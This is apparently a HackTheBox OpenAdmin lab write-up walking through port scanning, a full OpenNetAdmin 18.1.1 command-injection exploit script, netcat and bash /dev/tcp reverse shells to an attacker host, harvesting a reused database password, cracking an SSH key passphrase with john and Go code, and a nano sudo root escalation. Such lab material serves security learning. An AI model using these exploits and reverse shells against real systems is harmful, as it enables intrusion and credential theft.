OpenAdmin

To those who are bold enough to knock!

HackTheBox OpenAdmin Machine Info Card

OpenAdmin is an easy difficulty machine running Linux. It tests your knowledge in OSINT, exploitation through a publicly known exploit and basic privilege escalation using a GTFOBin.

Be sure to check out the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan openadmin.htb 
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-04 22:52 PST
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.73 seconds

We have two open ports: SSH on 22 and Apache on 80, which serves the default Ubuntu "It works" page.

Directory Bruteforce

Since that page seems like a dead end let’s check for any other directories that may be available:

gobuster dir -u http://openadmin.htb -t 10 -w /usr/share/wordlists/dirb/big.txt -o gobuster_dir.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://openadmin.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/04 22:23:56 Starting gobuster
===============================================================
/artwork (Status: 301)
/music (Status: 301)
/server-status (Status: 403)
/sierra (Status: 301)
===============================================================
2020/01/04 22:25:01 Finished
===============================================================

Let’s take a look at each of the directories we have found.

Arcwork

We have http://openadmin.htb/artwork/ which is a business website for Arcwork:

Arcwork Screenshot

Nothing seems to stand out at first glance and a quick view of the source reveals nothing interesting.

Sierra

Navigating to http://openadmin.htb/sierra/ we see another business site called Sierra:

Sierra Screenshot

I am starting to think there is a theme here. Web hosting or design company?

Sierra also doesn’t show anything interesting on the site or within the source.

SolMusic

Taking a look at http://openadmin.htb/music/ we have another business site called SolMusic:

SolMusic Screenshot

The first thing that catches our eye in comparison to the other sites is that this site has a Login link in the navbar.

OpenNetAdmin

The link takes us to http://openadmin.htb/ona/ where we come across this page:

OpenNetAdmin Screenshot

What stands out is the Newer Version Available alert, which lists the version v18.1.1. Although the page never names the web application directly, there is also a link to `DOWNLOAD the latest version`.

The download link takes us to http://opennetadmin.com/download.html, the site of OpenNetAdmin, a web application that keeps a database-managed inventory of your IP network:

ONA Download Screenshot

Looks like we have found our openadmin reference and most likely our way in!

Foothold

Let’s checkout OpenNetAdmin and see if there are any vulnerabilities available for that version:

searchsploit opennetadmin 18.1.1
-----------------------------------------------------------------------------------------
 Exploit Title                                      |  Path
                                                    | (/usr/share/exploitdb/)
-----------------------------------------------------------------------------------------
OpenNetAdmin 18.1.1 - Remote Code Execution         | exploits/php/webapps/47691.sh
-----------------------------------------------------------------------------------------
Shellcodes: No Result
Papers: No Result

We find one RCE exploit. Let’s check it out and see what we have got:

searchsploit -x exploits/php/webapps/47691.sh
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

Pretty straightforward. The script takes a URL as its only argument and uses curl with the -d option to send HTTP POST data. That POST is an xajax request to the tooltips window's ping action; ONA drops the ip argument into a shell command without sanitising it, so the ; in ip=>; ends the ping command and whatever follows runs as a separate OS command under the web server's user. This is OS command injection, not PHP code execution: the echo "BEGIN" and echo "END" markers exist only so sed can cut our command's output out of the XML response. One caveat: ${cmd} is interpolated into the POST body unencoded, so commands containing characters such as &, + or % will be mangled by form decoding; keep them simple or URL-encode them.
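To make those mechanics explicit, here is an added Go example (not the exploit author's code and not from this page) that builds the same POST body with proper percent-encoding, cuts the output out of a sample response the way the sed pipeline does, and shows the vulnerable string concatenation beside a hardened version. The xajax XML wrapper in sampleResponse is constructed for the demo and its exact markup is an assumption; only the BEGIN/END framing matters.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
	"strings"
)

// buildXajaxForm produces the same POST body the exploit sends, but builds it
// with url.Values so the command is percent-encoded: '&', '+', '%' and '#'
// inside cmd would otherwise be eaten by form decoding on the server.
func buildXajaxForm(cmd string) string {
	v := url.Values{}
	v.Set("xajax", "window_submit")
	v.Set("xajaxr", "1574117726710") // xajax request id, arbitrary
	v.Add("xajaxargs[]", "tooltips")
	// The "ip" value is what ONA drops into its ping shell command. The ';'
	// ends ping's argument list and everything after it runs as our command;
	// BEGIN/END are just markers so the output can be cut from the response.
	v.Add("xajaxargs[]", fmt.Sprintf(`ip=>;echo "BEGIN";%s;echo "END"`, cmd))
	v.Add("xajaxargs[]", "ping")
	return v.Encode()
}

// extractOutput does what the sed|tail|head pipeline does: keep the lines
// strictly between the first line containing BEGIN and the next line
// containing END. ok is false when the markers never appeared, which usually
// means the request did not reach the vulnerable handler at all.
func extractOutput(body string) (out string, ok bool) {
	var lines []string
	inside := false
	for _, line := range strings.Split(body, "\n") {
		switch {
		case !inside:
			if strings.Contains(line, "BEGIN") {
				inside = true
			}
		case strings.Contains(line, "END"):
			return strings.Join(lines, "\n"), true
		default:
			lines = append(lines, line)
		}
	}
	return "", false
}

// vulnerablePingCommand is the bug class in miniature: an attacker-controlled
// value concatenated into a string that a shell will parse. Any ';', '|',
// '$()' or backtick in ip becomes extra commands.
func vulnerablePingCommand(ip string) string {
	return "ping -c 3 " + ip
}

// safePingArgv is the hardened form: validate the value as an IP address and
// return an argv slice for exec-style execution (exec.Command in Go, or an
// argument array with proc_open in PHP), so no shell ever parses it.
func safePingArgv(ip string) ([]string, error) {
	if net.ParseIP(ip) == nil {
		return nil, fmt.Errorf("refusing to ping %q: not an IP address", ip)
	}
	return []string{"ping", "-c", "3", ip}, nil
}

// sampleResponse is a constructed stand-in for the xajax XML ONA returns;
// the wrapper markup is an assumption, only the BEGIN/END framing matters.
const sampleResponse = `<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="as" t="tooltip_html" p="innerHTML"><![CDATA[BEGIN
uid=33(www-data) gid=33(www-data) groups=33(www-data)
END
]]></cmd></xjx>`

func main() {
	fmt.Println(buildXajaxForm("id"))
	if out, ok := extractOutput(sampleResponse); ok {
		fmt.Println(out)
	}
	injected := `;echo "BEGIN";id;echo "END"`
	fmt.Println(vulnerablePingCommand(injected))
	if _, err := safePingArgv(injected); err != nil {
		fmt.Println(err)
	}
}
```

Run it with go run; the first line printed is the encoded form body you could hand to curl --data. extractOutput inherits the same limitation as the sed version: an output line that itself contains END ends the capture early, so pick different markers if your command could print that.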

Let's copy the exploit script to a file called exploit.sh and see if we can get a shell:

#!/bin/bash
# Usage: ./exploit.sh http://openadmin.htb/ona/
URL="${1}"
while true; do
  echo -n "$ "; read -r cmd
  # The injected "ip" value ends the ping command with ';' and runs ours;
  # the BEGIN/END markers let sed cut our output out of the xajax response.
  curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

And make the script executable:

chmod +x exploit.sh

Now all that’s left is to give it a run:

./exploit.sh http://openadmin.htb/ona/
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We gain a shell as www-data, a user that will most likely have limited access. We will need to move to another user.

Before we do that, let's get a netcat connection so we can upgrade to a proper shell. The nc on the box doesn't support the -e option, so we will use a named pipe instead.

First off we will set our netcat listener on our attacker machine:

nc -nvlp 1234

We then run the following commands on the victim to receive our connection:

mknod /tmp/backpipe p;/bin/sh -c "/bin/sh 0</tmp/backpipe | nc <attacker-ip> 1234 1>/tmp/backpipe"

From here we can upgrade our shell, noting that the victim only has python3 installed (so use python3, not python, for the pty trick).

User

Now we can see what other users we have and check their directory permissions while we are at it:

ls -l /home
total 8
drwxr-x--- 5 jimmy  jimmy  4096 Nov 22 23:15 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna

So we have two users to work with!

Because we are looking to take over another account, we will search for information leakage such as passwords and SSH keys, while keeping an eye out for a privesc to root. You just never know.

Looking at OpenNetAdmin's files, it is obvious the web application requires a database. A quick check shows MySQL is running:

ps -aux | grep mysql
mysql     1044  0.1 11.3 1633604 232332 ?      Sl   12:28   0:14 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
www-data 12798  0.0  0.0  11464  1104 pts/0    S+   14:48   0:00 grep mysql 

A web search for opennetadmin database password reveals that ONA keeps its database credentials in local/config/database_settings.inc.php under its install directory.

Let's check that file:

grep passwd /opt/ona/www/local/config/database_settings.inc.php
'db_passwd' => 'n1....0R!',

We find a password! Database passwords are frequently reused for user accounts, so let's try it against SSH for the users we saw in /home:

ssh jimmy@openadmin.htb
jimmy@openadmin.htb's password: 
jimmy@openadmin:~$

Inspecting jimmy's home folder we see there is no user.txt, so we are going to need access to joanna's account.

Let’s see where jimmy has read and write access:

find / -regextype posix-extended -regex "/(sys|srv|proc|run)" -prune -o -user jimmy -ls 2>&1 | grep -v "Permission denied"
.......................... snip ..........................
   286763      4 drwxrwx---   2 jimmy    internal     4096 Jan  5 12:46 /var/www/internal
   282830      4 -rwxrwxr-x   1 jimmy    internal      389 Jan  5 12:46 /var/www/internal/main.php
     2644      4 -rwxrwxr-x   1 jimmy    internal      185 Nov 23 16:37 /var/www/internal/logout.php
     1387      4 -rwxrwxr-x   1 jimmy    internal     3229 Nov 22 23:24 /var/www/internal/index.php
.......................... snip ..........................

Looking at these files, index.php is a login page that accepts jimmy's username and password, and main.php contains shell_exec('cat /home/joanna/.ssh/id_rsa');, which outputs joanna's private SSH key. That is exactly what we are after. We also see Don't forget your "ninja" password. Don't worry, we won't ;)

These files aren't under http://openadmin.htb's document root. Maybe there is a vhost serving this location that we haven't found yet? Let's check the Apache config:

ls -l /etc/apache2/sites-available/
total 16
-rw-r--r-- 1 root root 6338 Jul 16 18:14 default-ssl.conf
-rw-r--r-- 1 root root  303 Nov 23 17:13 internal.conf
-rw-r--r-- 1 root root 1329 Nov 22 14:24 openadmin.conf

There it is! Taking a look at internal.conf we find what we are looking for:

cat /etc/apache2/sites-available/internal.conf 
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

We see that Apache is listening on 127.0.0.1:52846 only, so this site is reachable just from the box itself, and a quick curl -u jimmy:n1....0R! 127.0.0.1:52846 outputs the contents of index.php.

Requesting main.php prints joanna's SSH key. It can read a file in joanna's home because the AssignUserID directive makes mpm-itk run this vhost's PHP as joanna rather than www-data:

curl -u jimmy:n1....0R! 127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
.... SNIP ....
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Dont forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Path 1 - SSH Key

Since we have joanna's SSH key, and it is passphrase-protected (note the Proc-Type: 4,ENCRYPTED and DEK-Info headers), we can try cracking the passphrase. Copy the key to a file on the attacker machine such as id_rsa.

We will then convert the key to a hash john understands:

ssh2john id_rsa > id_rsa-hash

We can then try cracking it with john:

john --wordlist=/root/wordlists/passwords/passwords.txt id_rsa-hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bl....as      (/root/Documents/openadmin/id_rsa-joanna)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:10 DONE (2020-01-14 18:21) 0.09596g/s 1376Kp/s 1376Kc/s 1376KC/sa6_123..*7¡Vamos!
Session completed

NOTE: I don’t use just rockyou.txt. The passwords.txt is a custom created wordlist made from multiple wordlists stripped of all duplicates. You may need to do the same!
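What john is actually doing with that hash, as an added Go example rather than anything from the page: the leaked key is in OpenSSL's legacy encrypted PEM format, whose key derivation is a single MD5 of passphrase and salt, so each guess costs one MD5 plus one AES-CBC decrypt. Go's standard library implements exactly that derivation. The key, the passphrase "correct-horse" and the mini wordlist are constructed for the demo and have nothing to do with joanna's real key.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"encoding/pem"
	"errors"
	"fmt"
)

// crackPEMPassphrase tries each candidate against a legacy OpenSSL-encrypted
// PEM key, the "Proc-Type: 4,ENCRYPTED" / "DEK-Info: AES-128-CBC,<iv>" format
// main.php leaked. x509.DecryptPEMBlock derives the AES key from a single MD5
// of passphrase||salt exactly as OpenSSL does (john's "iteration count is 1"),
// which is why guessing is so cheap. A decrypt that does not error only means
// the PKCS#7 padding looked plausible (roughly 1 in 256 wrong guesses pass that
// check), so a candidate is confirmed only when the plaintext parses as a
// PKCS#1 key; that is the false positive john warns about.
func crackPEMPassphrase(pemData []byte, candidates []string) (string, error) {
	block, _ := pem.Decode(pemData)
	if block == nil {
		return "", errors.New("no PEM block found")
	}
	if !x509.IsEncryptedPEMBlock(block) {
		return "", errors.New("key is not passphrase-protected; use it directly")
	}
	for _, pw := range candidates {
		der, err := x509.DecryptPEMBlock(block, []byte(pw))
		if err != nil {
			continue // bad padding: definitely the wrong passphrase
		}
		if _, err := x509.ParsePKCS1PrivateKey(der); err != nil {
			continue // padding looked fine by chance: false positive, keep going
		}
		return pw, nil
	}
	return "", errors.New("passphrase not in wordlist")
}

// sampleEncryptedKey builds a throwaway key protected with a known passphrase
// so the cracker can be exercised offline. It is constructed for this example
// and has nothing to do with joanna's real key or passphrase.
func sampleEncryptedKey(passphrase string) ([]byte, error) {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	block, err := x509.EncryptPEMBlock(rand.Reader, "RSA PRIVATE KEY",
		x509.MarshalPKCS1PrivateKey(key), []byte(passphrase), x509.PEMCipherAES128)
	if err != nil {
		return nil, err
	}
	return pem.EncodeToMemory(block), nil
}

func main() {
	pemData, err := sampleEncryptedKey("correct-horse")
	if err != nil {
		panic(err)
	}
	// A constructed mini wordlist standing in for passwords.txt.
	wordlist := []string{"password", "123456", "ninja", "correct-horse", "hunter2"}
	pw, err := crackPEMPassphrase(pemData, wordlist)
	if err != nil {
		fmt.Println("no hit:", err)
		return
	}
	fmt.Printf("passphrase found: %q\n", pw)
}
```

The cheap KDF is what makes a passwords.txt-sized list practical here; a key in the newer OpenSSH format (BEGIN OPENSSH PRIVATE KEY, bcrypt KDF, john's cost value 2) costs orders of magnitude more per guess, and the functions above would refuse it at the IsEncryptedPEMBlock check because it is not a PEM-level encryption at all.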

We recover the passphrase bl....as and can now log in via SSH using the key:

ssh -i id_rsa-joanna joanna@openadmin.htb
Enter passphrase for key 'id_rsa-joanna':
Last login: Tue Jan 14 18:20:08 2020 from 10.10.14.64
joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

Path 2 - Alter Script

With this script we have command execution as joanna, because the internal vhost runs its PHP as joanna (the AssignUserID directive above), so all we have to do is swap the command for a reverse shell.

So we will edit main.php and replace cat /home/joanna/.ssh/id_rsa with /bin/bash -c 'bash -i >& /dev/tcp/<attacker-ip>/1234 0>&1'.

Then we setup our netcat listener on our attacker machine:

nc -lvp 1234

Now let's request main.php again with jimmy's username and password:

curl -u jimmy:n1....0R! 127.0.0.1:52846/main.php

Back at our listener we should receive a connection:

Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:42950.
joanna@openadmin:/var/www$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

Now we can go for our user flag:

joanna@openadmin:/var/www$ cat /home/joanna/user.txt
c9b2cf07d4....60f0c81b5f

And there we have it! We have our user.txt.

Root

Let’s check to see if we have any sudo privileges.

If we came in via Path 2 (the altered script) we find that sudo fails with the following error:

sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin

This is most likely because our shell was spawned from Apache's mpm-itk worker, which after switching to joanna marks the process so that setuid binaries no longer gain privileges on exec; sudo therefore runs as joanna and its setresuid(0) call is refused. If /proc/self/status shows NoNewPrivs: 1, that is the flag responsible. The fix is a normal login: generate an SSH key pair on the attacker machine, append the public key to /home/joanna/.ssh/authorized_keys (writable now that we are joanna), and log in over SSH. From a proper session sudo works:

sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

We see that we can run nano as root, without a password, on /opt/priv. Since nano is a GTFOBin (it can execute a command from inside the editor, and that command inherits root), this is enough to gain a root shell; restricting the rule to one file does not help.

To do so, open the file with sudo /bin/nano /opt/priv, press CTRL+R and then CTRL+X to bring up the Command to execute prompt, and enter reset; sh 1>&0 2>&0 like so:

Nano GTFOBin Screenshot

That was a nice and easy root :)

Conclusion

This was an interesting machine with a fair few websites that could have sent some people on a wild goose chase. Focusing on important links like logins can be fruitful. Misconfigurations and outdated software can easily lead to a compromise in the real world. The privilege escalation to root once again highlights the problem with "ease of use" shortcuts such as passwordless sudo: the rule restricted joanna to one binary and one file, but that binary can spawn a shell, so the restriction was meaningless. Sadly this is a common real-world situation where people attempt to automate a task that involves a script needing escalated privileges.
